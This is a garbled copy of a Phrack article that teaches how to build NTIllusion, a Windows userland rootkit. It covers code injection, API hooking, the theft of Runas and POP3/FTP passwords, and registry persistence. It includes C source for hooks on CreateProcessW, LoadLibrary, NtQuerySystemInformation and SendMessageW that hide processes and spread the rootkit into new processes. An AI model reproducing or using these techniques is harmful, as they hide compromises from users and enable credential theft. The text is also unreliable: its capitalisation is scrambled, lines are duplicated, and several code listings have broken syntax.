== phrack inc. ==
Volume 0x0b, issue 0x3e, pHILE # 0x0c of 0x10
| = --------- = [NTILLusion: a portable win32 userland rootkit] = -------- = |
| = ------------------------------------------------ ---------------------- = |
| = ------------------ = [kdm
This Paper Describes How To Build A Windows User Land Rootkit. The First
Part Deal with the basis and describe a few methods to show how code
INJECTION AND CODE Interception Are Possible, While The Rest of the Paper
Covers The Strategy That Makes Stealth Possible in Userland. A Bigger
Version of the paper is also available at [1] so this novice people
Refer to a preliminary article about inJection and interception Basics.
Table of contents
INTRODUCTION
2. Code Injection and Interception
2.1. System Hooks
2.2. CreateRemoteThread
2.3. Manipulating Thread's Context
2.4. Redirecting The Import Address TABLE
2.5. INSERTING AN UNCONDITIONAL JUMP (JMP)
3. User Land Take over
3.1. User Land vs kernel land rootkits
3.2. Restrictions ...
3.3. ... and constraints
3.4. Setting a Global Hook to take over userland
3.5. Local Application Take over Over
4. Replacement functions
4.1. Process Hiding
4.2. File Hiding
4.3. Registry
4.4. NetStat Like Tools.
4.4.1. The Case Of Windows 2000
4.4.1.1. Hooking GetTcptable
4.4.1.2. Defeating NetStat
4.4.1.2. Defeating fport
4.4.2. The Case Of Windows XP
4.5. Global TCP Backdoor / Password Grabber
4.6. Privilege Escalation
4.7. Module Stealth
5. Ending
5.1. Conclusion
5.2. Greets
6. References
------- [1. Introduction
A rootkit is a program designed to control the behavior of a given
Machine. this is offen buy to hide the illegitimate presence of abackdoor and tasers. it acts by Denying the Listing of Certain
Elements When Requested by The User, Affecting Thereby The Confidence That
The Machine Has Not Been Compromised.
There Are Different Kinds of Rootkits. Some Act At The Very Bases of To
Operating system by sitting in kernel land, under the privileged ing 0
Mode. Some Others Run Under Lower Privileges in Ring 3 and Are Called User
Land rootkits, as The Target Directly The User's Applications INSTEAD OF
The system itself. Thase Ring 3 Rootkits Have Encountered A Recrudescence
The Last Years Since It Is Somewhat More Portable and Polyvalent Than Ring
0 Ones.
As there is are multiple ways to stay unseen under windows, this article
Performs a Windows Rootkitting Tutorial Based on a strong importation
Called The [NTILLUSION ROOTKIT] Which Fits Maximum Constraints.
THIS ROOTKIT HAS BEEN DESIGNED TO BE ABLE TO Run Under The Lowest
Privileges for a Given Account Under Windows. Indeed, IT Doesn't Use Any
Administrative Privilege to Be Able To Perform ITS Stealth As It Resides
Directly Inside Processes That Are Owned by The Current User. in A Word,
All The Ring 3 Programs That A User Might Use to Enumerate Files,
Processes, Registry Keys, And Used Ports Are Closely Controlled So They
Won't Reveal Unwanted Things. MeanWhile, The Rootkit Silently Waits for
Passwords, allowing the loading of any device driver as soon as an
Administrator Password is caught.
How does this works?
All this stuff is done in two steps. First, by injecting the rootkit's
Code Inside Each Application Owned by The Current User And Finally, by
Replacing strategic functions by provided ones. Thess Tricks Areperformed At Run Time Against a Running Process Rather Than on Hard Disk
On Binaries Since It Allows To Work Around The Windows File Protection,
Antiviral and Checksum Tools as Well. The rootkit Has Been Tested
SuccessFully Under Windows 2000 / XP, But May Also Run ON OLDER NTS. It's
Architecture Allows it to be ported to windows 9x / me but some functions
Are Missing (VirtualaLocex) OR Behave Abnormal (CreateremoteThread) ON
This Version of the OS.
This Introduction Would Not Have Been Achieved without Comments About The
Different Sections of The Paper That Present Each Special Characteristics.
Section 3 DEALS ABOUT User Land Take Over. This Mechanism Has Already Been
Presented by holy_father in [hidingen]. However it is here done in a
Different Way. in Fact, The Rootkit Acts Globally a Level Higher So Things
Are Changed and It Results in A Somewhat Simpler But Effic Spereading
Method. And Contrary to Hacker Defender ([HKDEF_RTK]), NTILLUSISON DOES NOT
NEED The Administrative Privilege. So The Approach I propose Is Difer.
This Approach Is Also Different When Speaking About The Way Functions Are
Chosen and replaced.
This is the case with section 4 Which Introduces An Uncommon Way To
Replace Original Functions. on One Hand, The Functions Are Most of The Time
Replaced at keNel Level. So, I Hope this Paper Shows That Performing A
Good Stealth Is Possible Also in Userland. on The Other Hand When Thinking
About API Replacement, People Try to Dig As Much as Possible in Order To
Hook at The Lowest Level. This is Sometimes a Goodthing, Sometimes Not.
This Is Especially True with Portability, Which SUFFERS from this run to
Low Level. Ntillusion Replaces Top Level APITEN AS POSSIBLE.AS Windows Designers Want Programs That Rely on The Document API To BE
Portable from One Windows Version to Another, And as The Rootkit Hijacks
Critical Functions Among this Document API, Portability Is Accrued.
Thereby there's no need to Perform OS Version Check and It Results in A
More universal rootkit. Added to That, This Section Offers A New Way for
Privilege escalation by showing how hooking the pop3 / ftp traffic IS
Possible in Order To Get Login and Passwords.
This is not the only new thing: Section 4.7 Offers a new way to hide a dll
Loaded Inside a Given Process. Usually, this Would Have Been Done B
Hooking Modules Enumeration Apis Inside The Memory Space of Each Process
Able To Reveal The Rootkit. However I show how this is Possible to do this
By Dealing Directly with undocumented structures pointed by the process
Environment Block. Once this Has Been Done, There's Not Need To Worry
About Subsequent Detection. To Test this Method i Downloaded a rootkit
Detector, [vice], and scaned my system. with no rootkit loading, vice
Produced Most of The Time Some False Positive for Standart DLLS (kernel32 /
Ntdll / ...). Once the rootkit Was loaded and use this technique, there
Was No Noticable Change and Vice Was Still Accusing Some System Dlls To Be
Rootkits as Before But There Was No Record About Kntillusion.dll That WAS
However doing the job effect.
------- [2. Code Injection and Interception
The goal of this section is to allow a process to replace the functions
of another. this involves getting control of the target process, the THEN
To Replace Parts of It's Memory Carefully. Let 's begn.
So Altering The Behavior of a Process Requires To Break Into It's MemorySpace in Order To Execute Some Code To Do The Job. Fortunately, Windows
Perfors Checks to Prevent An Application To Read or Write Memory of An
Other Application Without ITS Permission. Nevertheless The Windows
Programmers include several ways to bypass the native inter-process
Protection So Patching Other Processes' Memory At Runtime Is A True
Possibility. The First Step in Accessing a Running Process IS DONE TROUGH
The openprocess api. if The Application Possesses The Correct Security
Permissions, The Function Returns a Handle To DEAL with THE Process, in
The Other Case, IT Denies Access. by Triggering a Proper Privilege, A User
May Get Access to a privilegded process as we'll see late. in Windows NT,
a privilege is some sort of flag granted to a user tratows the user to
Override What Would Normally Be a Restrics To some Part of The
Operating system. this is the bight. but unfortunately there is
Also a Seamy Side. in Fact There's Multiple Ways to Break Into The Memory
Space of a Running process and running hostile code in it, by using
Document Functions of The Windows API. The Following Methods Have
Already Been Covered in The Past SO I WILL Only Give An Overview.
------- [2.1. System Hooks
The Most Known Technique Uses The SetWindowsHookex Function Which Sets A
Hook in The Message Event Handler of A Given Application. When Used As a
System hook, i.e.hen the hook is set for the whole userland, by releing
ON A Code Located in A DLL, The Operating System Injects The DLL INTO EACH
Running process matching the hook type. for example, IF a wh_keyboard hook
IS used and a key ispesed under notepad, the system will map the hook'sdll inside notepad.exe memory space. Easy as att ... for more information
On the topic, see [hooks] and [msdn_hooks]. Hooks Are Most of The Time
Used for development PACTHES OR Automating User Manipulation But The THE
Following Method Is from Far More Eloquent.
------- [2.2. CreateremoteThread
Another Gift for Windows Coders Is The CreateremoteThread API. AS ITS Name
Points Out, IT Allows The Creation of A Thread Inside The Memory Space of
a target process. this is expected by robert kuster in [3WAYS].
When Targeting a Process Running in A More Privileged Context, A rootkit
May Acquire God Power By Activating The SedebugPrivilege. for more
Information see the rootkit code. [ntillusion rootkit]
Althought this method seems intending, it is from far widespread and easy
TO Defeat Using A Security Driver. See Also [RemoteTh] for other info.
More over, anyinjected dll with this method will be easy noticed by
Any Program Performing Basic Module Enumeration. Section 4.7 Offers A
Solution to this Problem, While The Following Section Presents a Less
Known Way to Run Code Inside A Target Process.
------- [2.3. Manipulating thread's context
CreateremoteThread isn't the only debugging api thing be used to
Execute Code Into a target process. The Principle of The Following
Technique Is to Reroute a Program's Execution Flow to Malicious Code
INJECTED in The Program's Memory Space. This Involves Three Steps.
First, The Injector Chooses A Thread of this process and suspends it.
THEN, IT INJECTS The Code to Be Executed in The Target Process Memory AS
Before, Using Virtualalocex / WriteProcessMemory, And Changes A Few
Addresses Due To Changes in Memory Position. Next, IT Sets The Address Offe Next Instruction To Be Executed for this Thread (Eip Register) To
Point to the inject Code and restarts the thread. The injected code is
THEN EXECUTED ITRANGES for a Jump to the Remote Process. Finally It Arranges for a
Next Instruction That Should Have Been Executed If The Program Had
Followed ITS Normal Course, in Order To Resume ITS Activity As Soon AS
Possible. The idea of manipulating the thread's context is expected in
[LSD]. Other methods also exist to trigger the loading of a given DLL INSIDE
The Memory Space of a Target Process.
By Design, THE HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / WindowsNT / CURRENT
Version / Windows / Appinit_dlls Key Gathers The DLL To BE Loaded by To Be
System Inside Each Process Relying on User32.dll. Added to That Come
Bho, Standing for Browser Help Objects, That Act As Plugins for Web
Browsers, Enabling The Load of Any Sort of Code.
But Just Taking Over a Process Is Not Enough ...
Once The Target Process' Memory Space Is Under Control, IT's Possible
To Replace Its OWN Functions by Provided Ones.
Code Interception Routines Are Critical Since They Had to Meet Efficiency
And Speed Requirements. The method Have their THEIR
OWN Advantages and DrawBacks. as for the injection techniques, there
More Tan One Way to Do The Job. The Goal of The Methods IS To Redirect
Another Program's Function When IT ITED IN MEMORY. for the Target
Program, Everything Takes Place as if it had called the desired functions
AS Usual. But in Fact The Call IS Redirected to The Replacement API.
Some Methods of API Interception Are Based on Features Intensionally
PROVIDED by the designers of the peformat to simplify the loader's taskwhen a module is mapped in mail. The function redirection takes place
Once The Code We Inject Into The Target Process IS Executed. To Understand
How Theese Methods Work, A Thorous Understanding of The PE Format IS
Needed; See [PE] and hang on with courage, the folowing methods are
Useful.
------- [2.4. Redirecting The Import Address Table
After Injecting Our Code Into The Application's Memory Space, IT IS
Possible to change it it wehavior. We use a technique caled "API hooking"
Which Involves Replacing The Api by Own Routines. The Most Common Way
To do this is to alter the import address Table of a given module.
WHEN a Program Is Executed, ITS Various Zones Are Mapped Into Memory, And
The Addresses of the Functions It Calls Are Updated According To The THE
Windows Version and Service Pack. The PE Format Provides a Clever Solution
To do this update, WITHOUT PATCHING EVERY SINGLE CALL. WHEN YOU Compile
Your Program, Each Call to An External API Is Not Directly Pointing To The
Function's Entry Point In Memory. it is using a jump involving a dword
Pointer, Whose Address IS Among a Table Called The Import Address TABLE
(IAT), Since It Contains The Address of Each Imported Function. AT LOAD
Time, The Loader Just Needs to Patch Each Entry of the Iat to Modify THE
Target of Each Call for All API.
Thus, to hijack, we Simply Patch the Iat to make the memory point to out
Code Instead of the True Entry Point of The Target API. in this Way, WE
Have Total Control over the application, and any subsequent calls to this
Function Are Redirected. This General Idea of The Technique Which IS
Detailed more in [ivanov] and [unleashed]. But hooking at Iat Level ISFrom Far A Non Secure Way. Undirect Call May Be missed. To Prevent this,
There's only one solution ... INSERTING AN UNCONDITIONAL JUMP!
------- [2.5. Inserting An Unconditional Jump (JMP)
This Technique Involves Modifying The Machine Code of a Given API So That
IT EXECUTES An Unconditional Jump To a Replacement Function. Thus Any Call
- Direct or Indirect - To The Hooked API WILL INEVITABLY BE Redirected To
The New Function. this is the Type of Function Redirection Used by THE
Microsoft Detours Library [DETOTOURS]. In Theory, Redirection by Inserting
Of An Unconditional Jump Is Simple: You Simply Locate The Entry Point of
The api to be hijacked an insert an unconditional jump to the New
Function. This Technique make US Lose the Ability to call the Original
API, HOWEVER; THERE TWO WAYS TO WORK AROUND That Inconance.
The first is the method used in the family hxdef rootkit, or harker
Defender Which Is Now Open Source [HKDEF_RTK]. The Idea Is To INSERT AN
Unconditional Jump While Saving The Overwritten Instruction in A Buffer
ZONE. WHEN THE ORIGINAL API MUST BE CALED, The Redirection ENGINE
RESTORES The Real Api, Calls It, Then Repositions The Hook. The Problem
With this technique is that it is possible to lose the hook. if thisGs Go
WRONG, THERE IS a chance That the hook will not be rest wine not be rest atiled
The API. Another Thread of the Application May Api. Another Thread of the Application May
Access the Api Between The Time It Is Restored and The Time When The Hook
Is Repositioned. Thus, As ITS Creator Holy_father Knows, There IS a chance
That Some Calls May Be Lost When Using this Method.
However, There Inother Solution for Calling The Original API. Itinvolves Creating A Buffer Containing The Original Version of The API'S
Modified memory zone, FOLLOWED by a jump to and address locate 5 bytes
After the start of the zone. this jump allows to payue the Execution of
The Original Function Just After The Unconditional Jump That Performs The
REDIRECTION TO The Replacement Function. IT SEEMS SIMPLE?
NO, IT ISN '' One Detail That i Voluntarily Left Out Until Now: The
Problem of disassembling instructions. in Machine Code, Instructions Have
a variable length, how can we write an unconditional FIVE-BYTE JUMP While
Being Sure Not to Damage The Target Code ("Cutting An Instruction in
Half ")? The answer is simple: in Most Cases We Just Use A Basic
Disassembly Engine. It allows to recover As Many Complete Instructions AS
Required to Reach The size of FIVE BYtes, I. The Area Just Big Enough
The Insert The Unconditional Jump. The Useful Redirection Engine Used in
The rootkit is the one created by z0mbie (see [zombie2]).
This Hooking Method, Somewhat Particular Has Been Covered by Holy_father.
Refer to [hkdef] if you are interested.
Hum, That's All Folks About Prerequisite. Now We're Going to Consider How
To Build A Win32 Rootkit Using these Techniques. Le 'PLAY!
------- [3. User Land Take Over
------- [3.1 User Land vs kernel land rootkits
Most of the time, to Achieve their Aim Kernel Land Rootkits Simply Replace
The Native Api with some of their own by overoverwriting entries in the
Service Descriptor Table (SDT). Against a Normal Windows System, They
Don't have to worry About personistence as overce the hook is set, it will
Hijack All Subsequent Calls for All Processes. this isn't The Case Forwin32 Ring 3 Rootkits, Acting At User Level. in Fact, The Hook ISN '
Global as for kenel ones, and the rootkit must run it its code inside each
Process Able To Reveal ITS Presence.
Some Decide to hook all processes Running on the machine including those
Of The System Groups. It Requires Advanced INJECTION TECHNIQUES, HOOKING
Methods and to target API at Very Low Level.
Let me explain. Consider we want some directories not to be noticed
Browsing The Hard Drive Using Explorer. a Quick Look At Explorer.exe's
Import Table Reveals That It Is Using FindFirstFilea / W and FindnextFilea / W
So We May Hook these Functions. At First It Seem Tedious To Hook All
Thase Functions Rather Than Going a Level Under. Yeah, Thase Functions
Rely on the native api ntdll.zwquerydirectoryFile, It 10 Be Easier To
Hook this one instead. this is true for a given version of windows. but
This isn't Ideal for Compatibility. The More Low Level The Functions Are,
The more They're Subject to change. Added to That, IT IS Sometimes
Undocunted. So on The One Hand, There's Hijacking At Low Level, More
Accurate But Somewhat Hazardous, And On The Other Hand, Hijacking At High
Level, Less Accurate, But from Far SIMPLER TO SET UP.
Ntillusion Hijacks API At High Level Since I Never Designed It To Reside
INTO SYSTEM Processes. Each Choice Has A Bright Side and a Seamy Side.
The Following Points Describe The Restrictions I Wanded The Rootkit To Fit
And the constraints windows imposes to processes.
------- [3.2 Restrictions ...
THE ROOTKIT IS Made to Be Able To Perform ITS Stealth for the Current User
On The Local Machine. This Is Especially Designed for Cases Whereadministrator Level IS Unreachable for Some Reason. This show That
Getting root is sometimes not necessary to be lurking. It represents a
True Threat in this case, Since Windows Users Have the Bad Habit To Set
THEIR MAXIMUM Privilege ON Their Account INSTEAD OF TRIGGERING IT Using
Runas to Become Admin Only when needed. so, if the user is not currently
Admin, He Probably Isn't AT All, SO A User Land Rootkit Will Perfectly DO
THE Job. Otherwise, It's time to go kernel mode.
Thus, The Rootkit Is Designed to Only Require Privileges of The Current
User to become unsen to its eye, WHETHER this is an admin or not....
IT Starts Waiting for Passwords Collected by Users Using The Runas Method,
Allowing Privilege Escalation. It May Also Spy Web Traffic To Dynamically
Grab pop3 / ftp passwords on the fly. this is Possible But a little bit too
Vicious ...
------- [3.3 ... and continraints
As you shop now Know, Windows Maintains a Native Inter-Process
Protection SO A Process Won't Access Another if this One Doesn't Belong To
ITS Group OR Does Not Present The Administrator Nor Debug Privilege. so
The Rootkit Will Be Restrained to Affect Processes of The Current User.
ContrariWise, IF IT Got Admin Privilege, It May Add Itself TO
HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run Key and
Hide ITS Presence, Being The Active for All Users on the machine.
Due to the rootkit architecture, privileged processes Will Be Aable To See
The System As It Really Is. So Remote Administration May Reveal THE
Rootkit, AS MUCH AS FTP or HTTP Servers Running As Services. The Solution
Of this problem is to affect also system processes but the task questionomewhat desperate and too considrable to just play the game of cat mar
Mouse.
------- [3.4 Setting A Global Hook to Take OverLerland
To Be Efficient, The Rootkit Must Run Under All Visible Applications That
May Reveal Unwanted Presence. Performing an inJection Try for Each Running
Process when the rootkit loads is not a good idea since it won't affect
Processes That Would Be Run Later. a Perfect Way To Achieve this Is To Set
A System Wide Hook, Using SetWindowshookex for wh_cbt events. there,
The rootkit's dll Will be inject's dll Will BE INJECTED INTO All Running Graphical Processes,
AS Soon, As They Appear on Screen. Unfortunately, The wh_cbt concernsOn
Processes Using User32.dll, Therefore IT Won't affect some console
Programs. this is the case of windows cmd, netstat, and so on. there,
The rootkit must also affect processes so that it will be notified and
INJECTED WHEN A Process Creation is about to be done. this is achieved by
Hooking the createprocessw function into all inJected Processes. this Way,
The rootkit will be running inside any newly create process. The
CreateProcessw Replacement and The System Hook Are Complementary Methods.
This Combination Perfectly Covers All Situations: The Execution of A
Graphical or console process from explorer, The taskmanager or any osther
Application. It also Has the advantage to inject the rootkit INTO THE
TaskManager WHEN THE USER TRIGGERS CTRL Alt Del. in this case, the
Taskmanager is found by Winlogon Which isn't hijacked by the rootkit.
But The System Hook is injected Into As Soon As It Is Created, Since IT IS
A Graphical Process. To prevent a process from being inject twice
DLL Is Loaded It First Checks The Presence of this Signature and EXITS
Properly if needed. this is only a safty Since a check is performed in
Dllmain to Be Sure That The Reason Dllmain IS Called Matches
DLL_PROCESS_ATTACH. THIS EVENT ONLY TRIGGERS WHEN THE DLL IS FIRST MAPPED
Inside the memory space of the application, while subsequent calls to
Loadlibrary Will Only Increase Load Counter for this module and be marked
AS DLL_THREAD_ATTACH.
The Following Code Is The CreateProcessw Replacement of the Ntillusion
Rootkit. It Contains a Backdoor by Design: if The Application Name or ITS
Command Line Contains RTK_FILE_CHAR, The Process Is Not Hooded, Thus
Allowing Some Programs Not to Be Tricked by the rootkit. this is useful to
Launch Hidden Processes from Windows Shell That Performs a Search Before
Delegating the creation of the process. createprocessw.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---
Bool WinApi MycreateProcessw (LPCTSTR LPApplicationName,
LPTSTR LPCOMMANDLINE, LPSECURITY_ATTRIBUTES LPPROCESSATTRIBUTES,
LPSecurity_attributes lpthreadattributes, Bool Binherithandles,
DWORD DWCREATIONFLAGS, LPVOID LPENVIRONMENT,
LPCTSTR LPCURRENTDIRECTORY, LPSTARTUPINFO LPSTARTUPINFO,
LPPROCESS_INFORMATION LPPROCESSINFORMATION)
{
INT BRESULT, BINJECT = 1;
CHAR MSG [1024], CMDLINE [256], Appname [256];
/ * Resolve CreateProcessw Function Address if it hasn't been filled
By Iat Hijack. this happens when the function isn't imported at Iat
Level But Resolved At Runtime Using getProcaddresss. * /
IF (! fcreateprocessw)
{
FcreateProcessw = (FARPROC) FGetProcaddress ("kernel32.dll"),
"CREATEPROCESSW");
IF (! fcreateprocessw) Return 0;
}
/ * Clear parameters * /
MY_MEMSET (MSG, 0, 1024);
MY_MEMSET (CMDline, 0, 256);
MY_MEMSET (AppName, 0, 256);
/ * Convert Application Name and Command Line from unicode: * /
WideChartomultibyte (CP_ACP, 0, (const unsigned short *)
LPApplicationName, -1, AppName, 255, NULL, NULL
WideChartomultibyte (CP_ACP, 0, (const unsigned short *)
LPCommandline, -1, cmdline, 255, null, null;
/ * Call Original Function First, In Suspended Mode * /
BRESULT = (int) FcreateProcessw (Const unsigned short *)
LPApplicationName,
(unsigned short *) LPCommandline, LPPRocessAttributes,
LPTHREADATTRIBUTES, BINHERITHANDLES, CREATE_SUSPENDED
/ * dwcreationFlags * /, LpenVironment,
(const unsigned short *) lpcurrentdirectory,
(struct _startupinfow *) LPStartupinfo,
LPPROCESSINFORMATION);
/ * Inject the created process if its name & command line don't
Contain RTK_FILE_CHAR * /
IF (BRESULT)
{
IF
(lpcommandline && strstr ((char *) cmdline, (char *) RTK_FILE_CHAR)) ||
(LPApplicationName && Strstr ((char *) appname, (char *) RTK_FILE_CHAR))
)
{
OutputString ("/ N] CreateProcessw: Giving True Sight To
Process '% s' ... / n ", (char *) appname;
Wakeupprocess (LPPROCESSINFORMATION-> DWPROCESSID);
BINJECT = 0;
}
IF (BINJECT)
INJECTDLL (LPPROCESSINFORMATION-> HPROCESS,
(char *) KNTIDLLPATH);
CloseHandle (LPPROCESSINFORMATION-> HPROCESS);
CloseHandle (LPPROCESSINFORMATION-> HTHREAD);
}
Return BRESULT;
}
---------------------- End Example 1 ------------------------- ----
Note That The Child Process IS CREATED in Suspended Mode, THEN INJECTED BY
The DLL Using CreateremoteThread. The DLL Hook Function Next Wakes Thecurrent Process Up by Resuming All Its Threads. This Assus That The
Process Has Not Executed A Single Line of Its Own Code During The Hijack
Time.
------- [3.5 Local Application Take over
Being injected Into All Processes in The System Is The First Step To Take
The Ownership of User Land. When Being Able To Act Anywhere, It Must Keep
ITS Control and Prevent Any Newly Loaded Module To Escape The Function
Hooking That Has Been Set in Order To Hide Unwanted Things. so it is
Strongly Recommended to Filter Calls to LoadLibrarya / W / EX ORDER TO HOOK
Modules as soon as the same is loaded info memory. The following function. INTO MEY. The FOLLOWING FUNCTION
Demonstrates How To Replace Loadlibrarya in Order To Prevent Hooking
Escape.
-------------------------------------------------- ---
/ * LoadLibrary: prevent a process from escaping hijack by loading a new
Dll and calling one of its functions * /
Hinstance WinAPI MYLOADLIBRARY (LPCTSTR LPLIBFILENAME)
{
Hinstance hinst = null; / * dll Handle (by loadLibrary) * /
HModule hmod = null; / * dll Handle (by getModuleHandle) * /
Char * ldll = null; / * DLL PATH IN LOWER CASE * /
/ * Get Module Handle * /
HMOD = getModuleHandle (LPLIBFileName);
/ * Load Module * /
Hinst = (hinstance) FloadLibrary (LPLIBFileName);
/ * Everything went ok? * /
IF (hinst)
{
/ * If the dll Was already loaded, Don't set hooks a second
Time * /
IF (hmod == null)
{
/ * Duplicate DLL PATH TO Perform Lower Case Comparison * /
LDLL = _STRDUP ((char *) LPLIBFILENAME);
IF (! ldll)
Goto end;
/ * Convert it to lors case * /
_strlwr (ldll);
/ * Call hook function * /
SetUphooks ((int) NTI_ON_NEW_DLL, (CHAR *) LDLL);
Free (ldll);
}
}
End:
Return hinst;
}
---------------------- End Example 2 ------------------------- ----
As The Hijacking Method Used Is Entry Point ReWrit, We Must Check That
The Dll Has Not Been Yet Loaded Before Performing The Hooking. Otherwise,
This May Trigger An Infinite loop When Calling The Original Function. The ORIGINAL FUNCTION.
Job Is Partially Done by Setuphook That Will Perform The Hooking ON
Already loaded Module Only At Program Startup.
About getProcaddress:
At First Ntillusion Rootkit Was Using An Iat Hijacking Method in Order To
Replace File, Process, Registry and NetWork Apis to Perform ITS Stealth.
Under WinXP, All Worked Perfectly. But when I Tested It Under Win2000 i
Noticed a unusual behaviour in Explorer's Iat. in Fact, The Loader Doesn't
Fill the IAT Correctly for a Few Functions Such as CreateProcessw, So The
Address Written Doesn't Always Correspond to the API Entry Point
[Exploriat]. Scanning The Iat Looking for API Name Instead of It's Address
Does Not Solve The Problem. It Sees That Explorer is Performing Something
Strange ... SO i Moved from an Iat Hijacking Engine Needing to Hook
GetProcaddress in Order to Prevent Hook Escape, To The Unconditional Jump
Insertion That Does Not NEED TO Filter Calls to this API. Anyway, You CAN
Try to hijack getprocaddress and send the details of each call to debug
Output. The Amount of getProcaddress Calls Performed by Explorer IS
Amazing and ITS Study, Instructive.
------- [4. Replacement Functions
Here Comes The Most Pleasant Part of The Ntillusion Rootkit, I. The Core
Of the replacement functions.
------- [4.1. Process Hiding
The main target winter is the taskmanager.
Studying ITS IMPORT TABLALS That Performs Direct Calls Tontdll.ntQuerySystemInformation, So this Time, Hijacking API At Higher
Level IS Useless and the situation leaves no choice. The role of the
Replacement function is to hide the presence of each process whose image
Name Begins with rtk_process_char string. Retrieving The Processes List IS
Done Through a call to the [ntquerysysteminformation] API.
NTSTATUS NTQUERYSYSTEMINFORMATION
System_information_class systeminformationclass,
PVOID SystemInformation,
Ulong SystemInformationLength,
Pulong ReturnLength
);
The NtquerySystemInformation Function Retrieves Various Kinds of System
Information .hen Specifying SystemInformationClass to Be Equal To
SystemProcessInformation, The Api Returns an Array of System_Process_
Information Structures, ONE for Each Process Running in the system. These
Structures Contain Information About The Resource Usage of Each Process,
INCLUDING THE NUMBER OF HANDLES Used by The Process, The Peak Page-file
Usage, and the number of memory pages what the process has allocated, AS
Described in the msdn. The function returns an array of
System_Process_information Structures Thought the systemInformation
Parameter.
Each Structure Has The Following Layout:
Typedef struct _system_process_information
{
DWORD NEXTENTRYDELTA;
DWORD DTHREADCOUNT;
DWORD DRESERVED01;
DWORD DRESERVED02;
DWORD DRESERVED03;
DWORD DRESERVED04;
DWORD DRESERVED05;
DWORD DRESERVED06;
Filetime fTCREATETIME; / * RELATIVE to 01-01-1601 * /
Filetime fTusertime; / * 100 nsec units * /
Filetime ftkerneltime; / * 100 nsec units * /
Unicode_string processname;
DWORD basepriority; dword duniqueprocessid;
DWORD DPARENTPROCESSID;
DWORD DHANDECOUNT;
DWORD DRESERVED07;
DWORD DRESERVED08;
DWORD VMCOUNTERS;
DWORD DCOMMITCHARGE;
System_thread_information threadinfos [1];
} System_process_information, * psystem_process_information;
Hiding a process is possible by Playing with the next NEXTENTRYDELTA Member of
The structure, Which represents an offset to the next system_process_
Information entry. The end of the list is marked by a nextenTryDelta Equal
TO ZERO.
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---
/ * MyntQuerySysteminformation: Install a hook at system query
Level to prevent _nti * processes from being shown.
THANKS TO R-E-D for this function is called in rknt rootkit.
(Error Checks Stripped)
* /
DWORD WINAPI MyntQuerySystemInformation (DWord SystemInformationClass,
PVOID SystemInformation, Ulong SystemInformationLength,
Pulong ReturnLength)
{
Psystem_process_information PSPicurrent, PSPIPREC;
Char * PNAME = NULL;
DWORD RC;
/ * 1st of all, get the return value of the function * /
Rc = FntQuerySystemInformation (SystemInformationClass,
Systeminformation, SystemInformationLength; ReturnLength;
/ * if successful, perform sorting * /
IF (rc == status_success)
{
/ * System info * /
Switch (SystemInformationClass)
{
/ * Process List * /
Case SystemProcessInformation:
PSPICURRENT = PSPIPREC = (psystem_process_information)
SystemInformation;
While (1)
{
/ * Alloc Memory To Save Process Name in Ainsi
8biets string charset * /
PNAME = (char *) GlobalAlloc (GMEM_ZEROINIT,
PSPicurrent-> ProcessName.length 2);
/ * Convert Unicode String to ainsi * / widechartomultibyte (CP_ACP, 0,
PSPicurrent-> ProcessName.Buffer,
PSPicurrent-> ProcessName.length 1,
PNAME, PSPICURRENT-> ProcessName.length 1,
NULL, NULL);
/ * IF "hidden" process * /
IF (! _ strnicmp ((char *) PNAME, RTK_PROCESS_CHAR,
Strlen (RTK_PROCESS_CHAR))))))
{
/ * First process * /
IF (pspicurrent-> narxtentryDelta == 0)
{
PspipRec-> nextentryDelta = 0;
Break;
}
Else
{
PspipRec-> NEXTENTRYDELTA =
PSPicurrent-> NEXTENTRYDELTA;
PSPICURRENT =
(Psystem_process_information) (PCHAR)
PSPICURRENT
PSPICURRENT-> NEXTENTRYDELTA);
}
}
Else
{
IF (pspicurrent-> nextenTryDelta == 0) Break;
PSPIPREC = pspicurrent;
/ * Walk the list * /
PSPICURRENT = (psystem_process_information)
(PCHAR) PSPICURRENT
PSPICURRENT-> NEXTENTRYDELTA);
}
GlobalFree (PNAME);
} / * / while * /
Break;
} / * / switch * /
} / * / if * /
Return (RC);
}
---------------------- End Example 3 ------------------------- ----
Previously I Said That Targeting NTQuerySystemInformation Was The ONLY
It's online, it's, it's, it is is is not entirely true. It's contrariwise sure that hooking
Process32first / Next Won't help but it's still picture to do otherwise.
At First I Chose to Hook SendMessage, Therefore Hiding At Listbox Control
Level. this is a very specific approach to the problem and is
undocumented. SPYING THE Behavior of The TaskManager on Process Creation
With spy shows this buys the row telling About system idling process
And changes its name to show the newly created process by sending a
LVM_SETITETEXT Message. So, First It Overwrites The Content of this
Listbox item's line, and then address "iDLE process" line by sending alvm_insertitemw message. Filtering these Two types of message let us
CONTROL What The TaskManager Shows. Not Very Professional But Efficient.
The Following Function Replace SendMessagew Inside The Task Manager To
PREVENT The Program To Send Messages Related to Hidden Process.
------------------------------------------------------------------------------- ---
/ * MysendMessagew: Install A Hook At Display Level (That Is To Say At
Listbox level to prevent _ * processes from being shown * /
LResult WinApi MysendMessagew
HWND HWND, / * HANDLE OF DESTINATION WINDOW * /
UINT MSG, / * Message To Send * /
WPARAM WPARAM, / * FIRST Message Parameter * /
LParam lparam / * second message parameter * /
{
LPLVITEM PIT; / * Simple Pointer To a lvitem structure * /
/ * Filter Events * /
IF (MSG == LVM_SETITETITEM || MSG == LVM_INSERTITEMW ||
MSG == LVM_SETITETETEXTW)
{
/ * If process name starts by '_', hide t * /
IF ((char) (pit-> psztext) == '_')
{
HWND = msg = wparam = lparam = null;
Return 0;
}
}
/ * in the other case, just call the genuine function * /
Return fsendMessagew (HWND, MSG, WPARAM, LPARAM);
}
---------------------- End Example 1 ------------------------- ----
This Very High Level Hook Does The Job But IT Will Only Work for
Taskmgr.exe.
------- [4.2. File Hiding
Another Frequently Asked Question Is How To Hide Files. As Explained
Above, i Choose to Hook FindFirstFilea / W and FindnextFilea / W. It is from
Far Sufficient to Defeat Explorer View, The Dir Command, And All Dialog
Boxes provided by the common controls.
According the [msdn] The Findfirstfile Function Searches A Directory for A
File or subdirectory whose name matches the specified name.handle findfirstfile
LPCTSTR LPFILENAME,
LPWIN32_FIND_DATA LPFINDFILEDATA
);
The Function Takes Two Parameters. A Null-Terminated String That Specifies
A Valid Directory or Path and File Name, Which Can Contain Wildcard
Characters (* and?): lpfilename, And a Pointer to a win32_find_data
Structure That Receives Information About The Found File OR Subdirectory.
If the function teameds, the return value is a search handle buy in a
